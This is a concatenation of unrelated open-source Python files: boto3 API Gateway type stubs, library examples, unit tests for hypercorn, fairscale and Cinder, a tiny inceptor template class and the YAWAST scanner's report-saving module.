@options([make_option('-q', '--quick', action="store_true",
help="Makes things fast")],
"source dest")
def do_something(self, arg, opts):
if opts.quick:
self.fast_button = True
"""
if not isinstance(option_list, list):
option_list = [option_list]
for opt in option_list:
options_defined.append(pyparsing.Literal(opt.get_opt_string()))
def option_setup(func):
optionParser = OptionParser()
for opt in option_list:
optionParser.add_option(opt)
optionParser.set_usage("%s [options] %s" % (func.__name__[3:], arg_desc))
optionParser._func = func
def new_func(instance, arg):
try:
opts, newArgList = optionParser.parse_args(arg.split())
newArgs = remaining_args(arg, newArgList)
arg = newArgs
except optparse.OptParseError as e:
instance.sendData(str(e))
return instance.sendData(optionParser.format_help())
return func(instance, arg, opts)
new_func.__doc__ = func.__doc__
new_func.__extended_doc__ = optionParser.format_help()
return new_func
return option_setup
|
boto3_type_annotations/boto3_type_annotations/apigatewayv2/client.py | cowboygneox/boto3_type_annotations | 119 | 12685111 | from typing import Optional
from botocore.client import BaseClient
from typing import Dict
from typing import Union
from botocore.paginate import Paginator
from botocore.waiter import Waiter
from typing import List
class Client(BaseClient):
def can_paginate(self, operation_name: str = None):
pass
def create_api(self, Name: str, ProtocolType: str, RouteSelectionExpression: str, ApiKeySelectionExpression: str = None, Description: str = None, DisableSchemaValidation: bool = None, Version: str = None) -> Dict:
pass
def create_api_mapping(self, ApiId: str, DomainName: str, Stage: str, ApiMappingKey: str = None) -> Dict:
pass
def create_authorizer(self, ApiId: str, AuthorizerType: str, AuthorizerUri: str, IdentitySource: List, Name: str, AuthorizerCredentialsArn: str = None, AuthorizerResultTtlInSeconds: int = None, IdentityValidationExpression: str = None, ProviderArns: List = None) -> Dict:
pass
def create_deployment(self, ApiId: str, Description: str = None, StageName: str = None) -> Dict:
pass
def create_domain_name(self, DomainName: str, DomainNameConfigurations: List = None) -> Dict:
pass
def create_integration(self, ApiId: str, IntegrationType: str, ConnectionId: str = None, ConnectionType: str = None, ContentHandlingStrategy: str = None, CredentialsArn: str = None, Description: str = None, IntegrationMethod: str = None, IntegrationUri: str = None, PassthroughBehavior: str = None, RequestParameters: Dict = None, RequestTemplates: Dict = None, TemplateSelectionExpression: str = None, TimeoutInMillis: int = None) -> Dict:
pass
def create_integration_response(self, ApiId: str, IntegrationId: str, IntegrationResponseKey: str, ContentHandlingStrategy: str = None, ResponseParameters: Dict = None, ResponseTemplates: Dict = None, TemplateSelectionExpression: str = None) -> Dict:
pass
def create_model(self, ApiId: str, Name: str, Schema: str, ContentType: str = None, Description: str = None) -> Dict:
pass
def create_route(self, ApiId: str, RouteKey: str, ApiKeyRequired: bool = None, AuthorizationScopes: List = None, AuthorizationType: str = None, AuthorizerId: str = None, ModelSelectionExpression: str = None, OperationName: str = None, RequestModels: Dict = None, RequestParameters: Dict = None, RouteResponseSelectionExpression: str = None, Target: str = None) -> Dict:
pass
def create_route_response(self, ApiId: str, RouteId: str, RouteResponseKey: str, ModelSelectionExpression: str = None, ResponseModels: Dict = None, ResponseParameters: Dict = None) -> Dict:
pass
def create_stage(self, ApiId: str, StageName: str, AccessLogSettings: Dict = None, ClientCertificateId: str = None, DefaultRouteSettings: Dict = None, DeploymentId: str = None, Description: str = None, RouteSettings: Dict = None, StageVariables: Dict = None) -> Dict:
pass
def delete_api(self, ApiId: str):
pass
def delete_api_mapping(self, ApiMappingId: str, DomainName: str):
pass
def delete_authorizer(self, ApiId: str, AuthorizerId: str):
pass
def delete_deployment(self, ApiId: str, DeploymentId: str):
pass
def delete_domain_name(self, DomainName: str):
pass
def delete_integration(self, ApiId: str, IntegrationId: str):
pass
def delete_integration_response(self, ApiId: str, IntegrationId: str, IntegrationResponseId: str):
pass
def delete_model(self, ApiId: str, ModelId: str):
pass
def delete_route(self, ApiId: str, RouteId: str):
pass
def delete_route_response(self, ApiId: str, RouteId: str, RouteResponseId: str):
pass
def delete_stage(self, ApiId: str, StageName: str):
pass
def generate_presigned_url(self, ClientMethod: str = None, Params: Dict = None, ExpiresIn: int = None, HttpMethod: str = None):
pass
def get_api(self, ApiId: str) -> Dict:
pass
def get_api_mapping(self, ApiMappingId: str, DomainName: str) -> Dict:
pass
def get_api_mappings(self, DomainName: str, MaxResults: str = None, NextToken: str = None) -> Dict:
pass
def get_apis(self, MaxResults: str = None, NextToken: str = None) -> Dict:
pass
def get_authorizer(self, ApiId: str, AuthorizerId: str) -> Dict:
pass
def get_authorizers(self, ApiId: str, MaxResults: str = None, NextToken: str = None) -> Dict:
pass
def get_deployment(self, ApiId: str, DeploymentId: str) -> Dict:
pass
def get_deployments(self, ApiId: str, MaxResults: str = None, NextToken: str = None) -> Dict:
pass
def get_domain_name(self, DomainName: str) -> Dict:
pass
def get_domain_names(self, MaxResults: str = None, NextToken: str = None) -> Dict:
pass
def get_integration(self, ApiId: str, IntegrationId: str) -> Dict:
pass
def get_integration_response(self, ApiId: str, IntegrationId: str, IntegrationResponseId: str) -> Dict:
pass
def get_integration_responses(self, ApiId: str, IntegrationId: str, MaxResults: str = None, NextToken: str = None) -> Dict:
pass
def get_integrations(self, ApiId: str, MaxResults: str = None, NextToken: str = None) -> Dict:
pass
def get_model(self, ApiId: str, ModelId: str) -> Dict:
pass
def get_model_template(self, ApiId: str, ModelId: str) -> Dict:
pass
def get_models(self, ApiId: str, MaxResults: str = None, NextToken: str = None) -> Dict:
pass
def get_paginator(self, operation_name: str = None) -> Paginator:
pass
def get_route(self, ApiId: str, RouteId: str) -> Dict:
pass
def get_route_response(self, ApiId: str, RouteId: str, RouteResponseId: str) -> Dict:
pass
def get_route_responses(self, ApiId: str, RouteId: str, MaxResults: str = None, NextToken: str = None) -> Dict:
pass
def get_routes(self, ApiId: str, MaxResults: str = None, NextToken: str = None) -> Dict:
pass
def get_stage(self, ApiId: str, StageName: str) -> Dict:
pass
def get_stages(self, ApiId: str, MaxResults: str = None, NextToken: str = None) -> Dict:
pass
def get_waiter(self, waiter_name: str = None) -> Waiter:
pass
def update_api(self, ApiId: str, ApiKeySelectionExpression: str = None, Description: str = None, DisableSchemaValidation: bool = None, Name: str = None, RouteSelectionExpression: str = None, Version: str = None) -> Dict:
pass
def update_api_mapping(self, ApiId: str, ApiMappingId: str, DomainName: str, ApiMappingKey: str = None, Stage: str = None) -> Dict:
pass
def update_authorizer(self, ApiId: str, AuthorizerId: str, AuthorizerCredentialsArn: str = None, AuthorizerResultTtlInSeconds: int = None, AuthorizerType: str = None, AuthorizerUri: str = None, IdentitySource: List = None, IdentityValidationExpression: str = None, Name: str = None, ProviderArns: List = None) -> Dict:
pass
def update_deployment(self, ApiId: str, DeploymentId: str, Description: str = None) -> Dict:
pass
def update_domain_name(self, DomainName: str, DomainNameConfigurations: List = None) -> Dict:
pass
def update_integration(self, ApiId: str, IntegrationId: str, ConnectionId: str = None, ConnectionType: str = None, ContentHandlingStrategy: str = None, CredentialsArn: str = None, Description: str = None, IntegrationMethod: str = None, IntegrationType: str = None, IntegrationUri: str = None, PassthroughBehavior: str = None, RequestParameters: Dict = None, RequestTemplates: Dict = None, TemplateSelectionExpression: str = None, TimeoutInMillis: int = None) -> Dict:
pass
def update_integration_response(self, ApiId: str, IntegrationId: str, IntegrationResponseId: str, ContentHandlingStrategy: str = None, IntegrationResponseKey: str = None, ResponseParameters: Dict = None, ResponseTemplates: Dict = None, TemplateSelectionExpression: str = None) -> Dict:
pass
def update_model(self, ApiId: str, ModelId: str, ContentType: str = None, Description: str = None, Name: str = None, Schema: str = None) -> Dict:
pass
def update_route(self, ApiId: str, RouteId: str, ApiKeyRequired: bool = None, AuthorizationScopes: List = None, AuthorizationType: str = None, AuthorizerId: str = None, ModelSelectionExpression: str = None, OperationName: str = None, RequestModels: Dict = None, RequestParameters: Dict = None, RouteKey: str = None, RouteResponseSelectionExpression: str = None, Target: str = None) -> Dict:
pass
def update_route_response(self, ApiId: str, RouteId: str, RouteResponseId: str, ModelSelectionExpression: str = None, ResponseModels: Dict = None, ResponseParameters: Dict = None, RouteResponseKey: str = None) -> Dict:
pass
def update_stage(self, ApiId: str, StageName: str, AccessLogSettings: Dict = None, ClientCertificateId: str = None, DefaultRouteSettings: Dict = None, DeploymentId: str = None, Description: str = None, RouteSettings: Dict = None, StageVariables: Dict = None) -> Dict:
pass
|
examples/tile.py | penguinflys/imgviz | 171 | 12685123 | #!/usr/bin/env python
import matplotlib.pyplot as plt
import imgviz
def tile():
data = imgviz.data.arc2017()
rgb = data["rgb"]
bboxes = data["bboxes"].astype(int)
masks = data["masks"] == 1
crops = []
for bbox, mask in zip(bboxes, masks):
slice_ = slice(bbox[0], bbox[2]), slice(bbox[1], bbox[3])
rgb_crop = rgb[slice_]
mask_crop = mask[slice_]
crops.append(rgb_crop * mask_crop[:, :, None])
tiled = imgviz.tile(imgs=crops, border=(255, 255, 255))
# -------------------------------------------------------------------------
plt.figure(dpi=200)
plt.subplot(121)
plt.title("original")
plt.imshow(rgb)
plt.axis("off")
plt.subplot(122)
plt.title("instances")
plt.imshow(tiled)
plt.axis("off")
img = imgviz.io.pyplot_to_numpy()
plt.close()
return img
if __name__ == "__main__":
from base import run_example
run_example(tile)
|
inceptor/engine/component/UnookComponent.py | whitefi/inceptor | 743 | 12685130 | from config.Config import Config
from engine.component.TemplateModuleComponent import TemplateModuleComponent
class UnhookComponent(TemplateModuleComponent):
def __init__(self, code=None):
placeholder = Config().get("PLACEHOLDERS", "UNHOOK")
super().__init__(code, placeholder)
|
stix_shifter_modules/error_test/stix_translation/results_translator.py | pyromaneact/stix-shifter | 129 | 12685159 | from stix_shifter_utils.modules.base.stix_translation.base_results_translator import BaseResultTranslator
from stix_shifter_utils.stix_translation.src.utils.exceptions import TranslationResultException
import json
import uuid
ERROR_TYPE_TRANSLATE_EXCEPTION = 'translate_exception'
class ResultsTranslator(BaseResultTranslator):
def read_json(self, filepath, options):
return '{}'
def translate_results(self, data_source, data):
error_type = self.options.get('error_type')
if self.options.get('error_type') == ERROR_TYPE_TRANSLATE_EXCEPTION:
raise TranslationResultException("Test exception in translate_results")
# Wrap data in a STIX bundle and insert the data_source identity object as the first object
bundle = {
"type": "bundle",
"id": "bundle--" + str(uuid.uuid4()),
"objects": []
}
data_source = json.loads(data_source)
bundle['objects'] += [data_source]
# Data is already STIX and we don't want to touch it
bundle_data = json.loads(data)
for obs in bundle_data:
obs["created_by_ref"] = data_source['id']
bundle['objects'] += bundle_data
return bundle
|
config.py | ZevranGong/webserver | 125 | 12685160 | WTF_CSRF_ENABLED = True
SECRET_KEY = 'you-will-never-guess' |
tests/trio/test_keep_alive.py | ai-mocap/hypercorn | 264 | 12685176 | <reponame>ai-mocap/hypercorn<gh_stars>100-1000
from __future__ import annotations
from typing import Callable, Generator
import h11
import pytest
import trio
from hypercorn.config import Config
from hypercorn.trio.tcp_server import TCPServer
from hypercorn.typing import Scope
from ..helpers import MockSocket
KEEP_ALIVE_TIMEOUT = 0.01
REQUEST = h11.Request(method="GET", target="/", headers=[(b"host", b"hypercorn")])
async def slow_framework(scope: Scope, receive: Callable, send: Callable) -> None:
while True:
event = await receive()
if event["type"] == "http.disconnect":
break
elif event["type"] == "lifespan.startup":
await send({"type": "lifspan.startup.complete"})
elif event["type"] == "lifespan.shutdown":
await send({"type": "lifspan.shutdown.complete"})
elif event["type"] == "http.request" and not event.get("more_body", False):
await trio.sleep(2 * KEEP_ALIVE_TIMEOUT)
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [(b"content-length", b"0")],
}
)
await send({"type": "http.response.body", "body": b"", "more_body": False})
break
@pytest.fixture(name="client_stream", scope="function")
def _client_stream(
nursery: trio._core._run.Nursery,
) -> Generator[trio.testing._memory_streams.MemorySendStream, None, None]:
config = Config()
config.keep_alive_timeout = KEEP_ALIVE_TIMEOUT
client_stream, server_stream = trio.testing.memory_stream_pair()
server_stream.socket = MockSocket()
server = TCPServer(slow_framework, config, server_stream)
nursery.start_soon(server.run)
yield client_stream
@pytest.mark.trio
async def test_http1_keep_alive_pre_request(
client_stream: trio.testing._memory_streams.MemorySendStream,
) -> None:
await client_stream.send_all(b"GET")
await trio.sleep(2 * KEEP_ALIVE_TIMEOUT)
# Only way to confirm closure is to invoke an error
with pytest.raises(trio.BrokenResourceError):
await client_stream.send_all(b"a")
@pytest.mark.trio
async def test_http1_keep_alive_during(
client_stream: trio.testing._memory_streams.MemorySendStream,
) -> None:
client = h11.Connection(h11.CLIENT)
await client_stream.send_all(client.send(REQUEST))
await trio.sleep(2 * KEEP_ALIVE_TIMEOUT)
# Key is that this doesn't error
await client_stream.send_all(client.send(h11.EndOfMessage()))
@pytest.mark.trio
async def test_http1_keep_alive(
client_stream: trio.testing._memory_streams.MemorySendStream,
) -> None:
client = h11.Connection(h11.CLIENT)
await client_stream.send_all(client.send(REQUEST))
await trio.sleep(2 * KEEP_ALIVE_TIMEOUT)
await client_stream.send_all(client.send(h11.EndOfMessage()))
while True:
event = client.next_event()
if event == h11.NEED_DATA:
data = await client_stream.receive_some(2 ** 16)
client.receive_data(data)
elif isinstance(event, h11.EndOfMessage):
break
client.start_next_cycle()
await client_stream.send_all(client.send(REQUEST))
await trio.sleep(2 * KEEP_ALIVE_TIMEOUT)
# Key is that this doesn't error
await client_stream.send_all(client.send(h11.EndOfMessage()))
@pytest.mark.trio
async def test_http1_keep_alive_pipelining(
client_stream: trio.testing._memory_streams.MemorySendStream,
) -> None:
await client_stream.send_all(
b"GET / HTTP/1.1\r\nHost: hypercorn\r\n\r\nGET / HTTP/1.1\r\nHost: hypercorn\r\n\r\n"
)
await client_stream.receive_some(2 ** 16)
await trio.sleep(2 * KEEP_ALIVE_TIMEOUT)
await client_stream.send_all(b"")
|
tests/nn/checkpoint/test_checkpoint_activations_norm.py | zhaojuanmao/fairscale | 1,662 | 12685186 | # Copyright (c) Facebook, Inc. and its affiliates. All rights reserved.
#
# This source code is licensed under the BSD license found in the
# LICENSE file in the root directory of this source tree.
# pylint: disable=missing-module-docstring
# pylint: disable=missing-class-docstring
# pylint: disable=missing-function-docstring
""" Test checkpoint_wrapper with normalization layers. """
import pytest
import torch
from torch.nn import BatchNorm2d, LayerNorm, Linear, Sequential
from torch.optim import SGD
from fairscale.nn.checkpoint.checkpoint_activations import checkpoint_wrapper
from fairscale.utils import torch_version
from fairscale.utils.testing import objects_are_equal
NORM_TYPES = [LayerNorm, BatchNorm2d]
MP_TYPES = ["fp32", "fp16", "call_half"]
def get_model(norm_type, checkpointed, mixed_precision):
assert norm_type in NORM_TYPES, norm_type
assert checkpointed in [True, False], checkpointed
assert mixed_precision in MP_TYPES
model = Sequential(Linear(3, 2), norm_type(2))
if mixed_precision == "fp16":
# Set param.data and buffers as fp16
for p in model.parameters():
p.data = p.data.half()
for m in model:
for n, b in m.named_buffers():
setattr(m, n, b.half())
elif mixed_precision == "call_half":
model.half()
if checkpointed:
model = checkpoint_wrapper(model)
return model
@pytest.mark.parametrize("device", ["cpu", "cuda"])
@pytest.mark.parametrize("norm_type", NORM_TYPES)
@pytest.mark.parametrize("mixed_precision", MP_TYPES)
def test_norm(device, norm_type, mixed_precision):
"""Test checkpoint_wrapper with different norm layers."""
if device == "cuda" and not torch.cuda.is_available():
pytest.skip("Skip due to lack of GPU")
# Get input, ref, checkpoint models and make them equal.
in_data = torch.rand(2, 2, 3, 3).to(device)
m_ref = get_model(norm_type, False, mixed_precision).to(device)
m_cpt = get_model(norm_type, True, mixed_precision).to(device)
m_cpt.load_state_dict(m_ref.state_dict())
if torch_version() >= (1, 6, 0):
# This assert fails on 1.5.1.
assert objects_are_equal(m_ref.state_dict(), m_cpt.state_dict())
if mixed_precision != "fp32":
in_data = in_data.half()
# Needed due to checkpointing.
in_data.requires_grad = True
for model in (m_ref, m_cpt):
optim = SGD(model.parameters(), lr=0.1)
if device == "cpu" and mixed_precision != "fp32":
# Got: RuntimeError: "batch_norm"/"layer_norm" not implemented for 'Half'.
with pytest.raises(RuntimeError):
out = model(in_data)
return
else:
# Everything else work.
out = model(in_data)
out.sum().backward()
optim.step()
if torch_version() >= (1, 6, 0):
assert objects_are_equal(m_ref.state_dict(), m_cpt.state_dict())
|
yawast/reporting/reporter.py | Prodject/yawast | 200 | 12685187 | # Copyright (c) 2013 - 2019 <NAME> and Contributors.
# This file is part of YAWAST which is released under the MIT license.
# See the LICENSE file or go to https://yawast.org/license/ for full license details.
import gc
import hashlib
import json
import os
import time
import zipfile
from datetime import datetime
from typing import Dict, List, cast, Optional, Any, Union
from yawast.external.memory_size import Size
from yawast.external.total_size import total_size
from yawast.reporting.enums import Vulnerabilities, Severity
from yawast.reporting.issue import Issue
from yawast.scanner.plugins.result import Result
from yawast.shared import output
from yawast.shared.exec_timer import ExecutionTimer
_issues: Dict[str, Dict[Vulnerabilities, List[Issue]]] = {}
_info: Dict[str, Any] = {}
_data: Dict[str, Any] = {}
_evidence: Dict[str, Any] = {}
_domain: str = ""
_output_file: str = ""
def init(output_file: Union[str, None] = None) -> None:
global _output_file
if output_file is not None:
# if we have something, let's figure out what
output_file = os.path.abspath(output_file)
if os.path.isdir(output_file):
# it's a directory, so we are going to create a name
name = f"yawast_{int(time.time())}.json"
output_file = os.path.join(output_file, name)
elif os.path.isfile(output_file) or os.path.isfile(f"{_output_file}.zip"):
# the file already exists
print("WARNING: Output file already exists; it will be replaced.")
_output_file = output_file
def save_output(spinner=None):
# add some extra debug data
register_info("memsize_issues", total_size(_issues))
register_info("memsize_info", total_size(_info))
register_info("memsize_data", total_size(_data))
register_info("memsize_evidence", total_size(_evidence))
register_info("gc_stats", gc.get_stats())
register_info("gc_objects", len(gc.get_objects()))
if spinner:
spinner.stop()
print("Saving...")
if spinner:
spinner.start()
vulns = {}
for vuln in Vulnerabilities:
vulns[vuln.name] = {
"severity": vuln.severity,
"description": vuln.description,
"id": vuln.id,
}
data = {
"_info": _convert_keys(_info),
"data": _convert_keys(_data),
"issues": _convert_keys(_issues),
"evidence": _convert_keys(_evidence),
"vulnerabilities": vulns,
}
json_data = json.dumps(data, indent=4)
try:
zf = zipfile.ZipFile(f"{_output_file}.zip", "x", zipfile.ZIP_BZIP2)
with ExecutionTimer() as tm:
zf.writestr(
f"{os.path.basename(_output_file)}",
json_data.encode("utf_8", "backslashreplace"),
)
zf.close()
orig = "{0:cM}".format(Size(len(json_data)))
comp = "{0:cM}".format(Size(os.path.getsize(f"{_output_file}.zip")))
if spinner:
spinner.stop()
print(
f"Saved {_output_file}.zip (size reduced from {orig} to {comp} in {tm.to_ms()}ms)"
)
except Exception as error:
if spinner:
spinner.stop()
print(f"Error writing output file: {error}")
def get_output_file() -> str:
if len(_output_file) > 0:
return f"{_output_file}.zip"
else:
return ""
def setup(domain: str) -> None:
global _domain
_domain = domain
if _domain not in _issues:
_issues[_domain] = {}
if _domain not in _data:
_data[_domain] = {}
if _domain not in _evidence:
_evidence[_domain] = {}
def is_registered(vuln: Vulnerabilities) -> bool:
if _issues is None:
return False
else:
if _domain in _issues:
if _issues[_domain].get(vuln) is None:
return False
else:
return True
else:
return False
def register_info(key: str, value: Any):
if _output_file is not None and len(_output_file) > 0:
_info[key] = value
def register_data(key: str, value: Any):
if _output_file is not None and len(_output_file) > 0:
if _domain is not None:
if _domain in _data:
_register_data(_data[_domain], key, value)
else:
_data[_domain] = {}
_register_data(_data[_domain], key, value)
else:
_register_data(_data, key, value)
def register_message(value: str, kind: str):
if _output_file is not None and len(_output_file) > 0:
if "messages" not in _info:
_info["messages"] = {}
if kind not in _info["messages"]:
_info["messages"][kind] = []
_info["messages"][kind].append(f"[{datetime.utcnow()} UTC]: {value}")
def register(issue: Issue) -> None:
# make sure the Dict for _domain exists - this shouldn't normally be an issue, but is for unit tests
if _domain not in _issues:
_issues[_domain] = {}
# add the evidence to the evidence list, and swap the value in the object for its hash.
# the point of this is to minimize cases where we are holding the same (large) string
# multiple times in memory. should reduce memory by up to 20%
if _domain not in _evidence:
_evidence[_domain] = {}
if "request" in issue.evidence and issue.evidence["request"] is not None:
req = str(issue.evidence["request"]).encode("utf-8")
req_id = hashlib.blake2b(req, digest_size=16).hexdigest()
if req_id not in _evidence[_domain]:
_evidence[_domain][req_id] = issue.evidence["request"]
issue.evidence["request"] = req_id
if "response" in issue.evidence and issue.evidence["response"] is not None:
res = str(issue.evidence["response"]).encode("utf-8")
res_id = hashlib.blake2b(res, digest_size=16).hexdigest()
if res_id not in _evidence[_domain]:
_evidence[_domain][res_id] = issue.evidence["response"]
issue.evidence["response"] = res_id
# if we haven't handled this issue yet, create a List for it
if not is_registered(issue.vulnerability):
_issues[_domain][issue.vulnerability] = []
# we need to check to see if we already have this issue, for this URL, so we don't create dups
# TODO: This isn't exactly efficient - refactor
findings = _issues[_domain][issue.vulnerability]
findings = cast(List[Issue], findings)
for finding in findings:
if finding.url == issue.url and finding.evidence == issue.evidence:
# just bail out
output.debug(f"Duplicate Issue: {issue.id} (duplicate of {finding.id})")
return
_issues[_domain][issue.vulnerability].append(issue)
def display(msg: str, issue: Issue) -> None:
if issue.vulnerability.display_all or not is_registered(issue.vulnerability):
if issue.severity == Severity.CRITICAL or issue.severity == Severity.HIGH:
output.vuln(msg)
elif issue.severity == Severity.MEDIUM:
output.warn(msg)
else:
output.info(msg)
# if there's no evidence, default to the msg - better than nothing
if issue.evidence is None:
issue.evidence = msg.strip()
register(issue)
def display_results(results: List[Result], padding: Optional[str] = ""):
for res in results:
iss = Issue.from_result(res)
display(f"{padding}{res.message}", iss)
def _register_data(data: Dict, key: str, value: Any):
if key in data and isinstance(data[key], list) and isinstance(value, list):
ls = cast(list, data[key])
ls.extend(value)
elif key in data and isinstance(data[key], dict) and isinstance(value, dict):
dt = cast(dict, data[key])
dt.update(value)
else:
data[key] = value
def _convert_keys(dct: Dict) -> Dict:
ret = {}
for k, v in dct.items():
if isinstance(k, Vulnerabilities):
k = k.name
if isinstance(v, dict):
v = _convert_keys(v)
try:
_ = json.dumps(v)
except Exception as error:
output.debug(f"Error serializing data: {str(error)}")
# convert to string - this may be wrong, but at least it won't fail
v = str(v)
ret[k] = v
return ret
|
cinder/tests/unit/volume/drivers/dell_emc/unity/test_replication.py | helenwalsh/cinder | 571 | 12685203 | <filename>cinder/tests/unit/volume/drivers/dell_emc/unity/test_replication.py
# Copyright (c) 2016 - 2019 Dell Inc. or its subsidiaries.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import unittest
from unittest import mock
import ddt
from cinder import exception
from cinder.volume import configuration as conf
from cinder.volume.drivers.dell_emc.unity import adapter as unity_adapter
from cinder.volume.drivers.dell_emc.unity import driver
from cinder.volume.drivers.dell_emc.unity import replication
from cinder.volume.drivers.san.san import san_opts
@ddt.ddt
class UnityReplicationTest(unittest.TestCase):
@ddt.data({'version': '1.0.0', 'protocol': 'FC',
'expected': unity_adapter.FCAdapter},
{'version': '2.0.0', 'protocol': 'iSCSI',
'expected': unity_adapter.ISCSIAdapter})
@ddt.unpack
def test_init_adapter(self, version, protocol, expected):
a = replication.init_adapter(version, protocol)
self.assertIsInstance(a, expected)
self.assertEqual(version, a.version)
@ddt.ddt
class UnityReplicationDeviceTest(unittest.TestCase):
def setUp(self):
self.config = conf.Configuration(san_opts,
config_group='unity-backend')
self.config.san_ip = '1.1.1.1'
self.config.san_login = 'user1'
self.config.san_password = '<PASSWORD>'
self.driver = driver.UnityDriver(configuration=self.config)
conf_dict = {'backend_id': 'secondary_unity', 'san_ip': '2.2.2.2'}
self.mock_adapter = mock.MagicMock(is_setup=False)
def mock_do_setup(*args):
self.mock_adapter.is_setup = True
self.mock_adapter.do_setup = mock.MagicMock(side_effect=mock_do_setup)
with mock.patch('cinder.volume.drivers.dell_emc.unity.'
'replication.init_adapter',
return_value=self.mock_adapter):
self.replication_device = replication.ReplicationDevice(
conf_dict, self.driver)
@ddt.data(
{
'conf_dict': {
'backend_id': 'secondary_unity',
'san_ip': '2.2.2.2'
},
'expected': [
'secondary_unity', '2.2.2.2', 'user1', '<PASSWORD>', 60
]
},
{
'conf_dict': {
'backend_id': 'secondary_unity',
'san_ip': '2.2.2.2',
'san_login': 'user2',
'san_password': '<PASSWORD>',
'max_time_out_of_sync': 180
},
'expected': [
'secondary_unity', '2.2.2.2', 'user2', '<PASSWORD>', 180
]
},
)
@ddt.unpack
def test_init(self, conf_dict, expected):
self.driver.configuration.replication_device = conf_dict
device = replication.ReplicationDevice(conf_dict, self.driver)
self.assertListEqual(
[device.backend_id, device.san_ip, device.san_login,
device.san_password, device.max_time_out_of_sync],
expected)
self.assertIs(self.driver, device.driver)
@ddt.data(
{
'conf_dict': {'san_ip': '2.2.2.2'},
},
{
'conf_dict': {'backend_id': ' ', 'san_ip': '2.2.2.2'},
},
{
'conf_dict': {'backend_id': 'secondary_unity'},
},
{
'conf_dict': {'backend_id': 'secondary_unity', 'san_ip': ' '},
},
{
'conf_dict': {
'backend_id': 'secondary_unity',
'san_ip': '2.2.2.2',
'san_login': 'user2',
'san_password': '<PASSWORD>',
'max_time_out_of_sync': 'NOT_A_NUMBER'
},
},
)
@ddt.unpack
def test_init_raise(self, conf_dict):
self.driver.configuration.replication_device = conf_dict
self.assertRaisesRegex(exception.InvalidConfigurationValue,
'Value .* is not valid for configuration '
'option "unity-backend.replication_device"',
replication.ReplicationDevice,
conf_dict, self.driver)
@ddt.data(
{
'conf_dict': {
'backend_id': 'secondary_unity',
'san_ip': '2.2.2.2'
},
'expected': [
'2.2.2.2', 'user1', '<PASSWORD>'
]
},
{
'conf_dict': {
'backend_id': 'secondary_unity',
'san_ip': '2.2.2.2',
'san_login': 'user2',
'san_password': '<PASSWORD>',
'max_time_out_of_sync': 180
},
'expected': [
'2.2.2.2', 'user2', '<PASSWORD>'
]
},
)
@ddt.unpack
def test_device_conf(self, conf_dict, expected):
self.driver.configuration.replication_device = conf_dict
device = replication.ReplicationDevice(conf_dict, self.driver)
c = device.device_conf
self.assertListEqual([c.san_ip, c.san_login, c.san_password],
expected)
def test_setup_adapter(self):
self.replication_device.setup_adapter()
# Not call adapter.do_setup after initial setup done.
self.replication_device.setup_adapter()
self.mock_adapter.do_setup.assert_called_once()
def test_setup_adapter_fail(self):
def f(*args):
raise exception.VolumeBackendAPIException('adapter setup failed')
self.mock_adapter.do_setup = mock.MagicMock(side_effect=f)
with self.assertRaises(exception.VolumeBackendAPIException):
self.replication_device.setup_adapter()
def test_adapter(self):
self.assertIs(self.mock_adapter, self.replication_device.adapter)
self.mock_adapter.do_setup.assert_called_once()
def test_destination_pool(self):
self.mock_adapter.storage_pools_map = {'pool-1': 'pool-1'}
self.assertEqual('pool-1', self.replication_device.destination_pool)
@ddt.ddt
class UnityReplicationManagerTest(unittest.TestCase):
def setUp(self):
self.config = conf.Configuration(san_opts,
config_group='unity-backend')
self.config.san_ip = '1.1.1.1'
self.config.san_login = 'user1'
self.config.san_password = '<PASSWORD>'
self.config.replication_device = [
{'backend_id': 'secondary_unity', 'san_ip': '2.2.2.2'}
]
self.driver = driver.UnityDriver(configuration=self.config)
self.replication_manager = replication.ReplicationManager()
@mock.patch('cinder.volume.drivers.dell_emc.unity.'
'replication.ReplicationDevice.setup_adapter')
def test_do_setup(self, mock_setup_adapter):
self.replication_manager.do_setup(self.driver)
calls = [mock.call(), mock.call()]
default_device = self.replication_manager.default_device
self.assertEqual('1.1.1.1', default_device.san_ip)
self.assertEqual('user1', default_device.san_login)
self.assertEqual('password1', default_device.san_password)
devices = self.replication_manager.replication_devices
self.assertEqual(1, len(devices))
self.assertIn('secondary_unity', devices)
rep_device = devices['secondary_unity']
self.assertEqual('2.2.2.2', rep_device.san_ip)
self.assertEqual('user1', rep_device.san_login)
self.assertEqual('<PASSWORD>', rep_device.san_password)
self.assertTrue(self.replication_manager.is_replication_configured)
self.assertTrue(
self.replication_manager.active_backend_id is None
or self.replication_manager.active_backend_id == 'default')
self.assertFalse(self.replication_manager.is_service_failed_over)
active_adapter = self.replication_manager.active_adapter
calls.append(mock.call())
self.assertIs(default_device.adapter, active_adapter)
calls.append(mock.call())
mock_setup_adapter.assert_has_calls(calls)
@mock.patch('cinder.volume.drivers.dell_emc.unity.'
'replication.ReplicationDevice.setup_adapter')
def test_do_setup_replication_not_configured(self, mock_setup_adapter):
self.driver.configuration.replication_device = None
self.replication_manager.do_setup(self.driver)
calls = [mock.call()]
default_device = self.replication_manager.default_device
self.assertEqual('1.1.1.1', default_device.san_ip)
self.assertEqual('user1', default_device.san_login)
self.assertEqual('<PASSWORD>', default_device.san_password)
devices = self.replication_manager.replication_devices
self.assertEqual(0, len(devices))
self.assertFalse(self.replication_manager.is_replication_configured)
self.assertTrue(
self.replication_manager.active_backend_id is None
or self.replication_manager.active_backend_id == 'default')
self.assertFalse(self.replication_manager.is_service_failed_over)
active_adapter = self.replication_manager.active_adapter
calls.append(mock.call())
self.assertIs(default_device.adapter, active_adapter)
calls.append(mock.call())
mock_setup_adapter.assert_has_calls(calls)
@mock.patch('cinder.volume.drivers.dell_emc.unity.'
'replication.ReplicationDevice.setup_adapter')
def test_do_setup_failed_over(self, mock_setup_adapter):
self.driver = driver.UnityDriver(configuration=self.config,
active_backend_id='secondary_unity')
self.replication_manager.do_setup(self.driver)
calls = [mock.call()]
default_device = self.replication_manager.default_device
self.assertEqual('1.1.1.1', default_device.san_ip)
self.assertEqual('user1', default_device.san_login)
self.assertEqual('<PASSWORD>', default_device.san_password)
devices = self.replication_manager.replication_devices
self.assertEqual(1, len(devices))
